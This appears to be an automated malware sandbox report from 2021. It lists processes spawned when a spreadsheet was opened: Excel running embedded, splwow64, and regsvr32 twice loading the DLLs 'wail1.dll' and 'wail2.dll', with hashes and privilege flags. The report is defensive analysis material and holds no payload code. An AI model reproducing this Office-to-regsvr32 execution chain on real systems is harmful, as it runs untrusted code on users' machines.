                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:21:17:11
                                                                                                                                                    Start date:22/06/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:21:17:14
                                                                                                                                                    Start date:22/06/2021
                                                                                                                                                    Path:C:\Windows\splwow64.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                                    Imagebase:0x7ff77ee90000
                                                                                                                                                    File size:130560 bytes
                                                                                                                                                    MD5 hash:8D59B31FF375059E3C32B17BF31A76D5
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:21:17:26
                                                                                                                                                    Start date:22/06/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32 ..\wail1.dll
                                                                                                                                                    Imagebase:0x1040000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:21:17:26
                                                                                                                                                    Start date:22/06/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32 ..\wail2.dll
                                                                                                                                                    Imagebase:0x1040000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >